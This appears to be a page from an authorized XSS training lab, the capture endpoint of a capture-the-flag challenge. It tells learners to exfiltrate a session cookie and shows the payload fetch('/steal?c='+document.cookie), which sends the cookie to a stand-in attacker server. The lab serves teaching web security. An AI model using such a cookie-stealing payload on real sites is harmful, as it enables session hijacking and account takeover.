Cookies your XSS shipped here via fetch('/steal?c='+document.cookie). This stands in for your own attacker server - proof of real impact, not just a pop-up. Exfil the session cookie to capture the flag.
Nothing captured yet. Land a payload that calls /steal?c=document.cookie.
RatXSS Dojo · HackXpert Coaching · The XSS Rat · authorized lab use only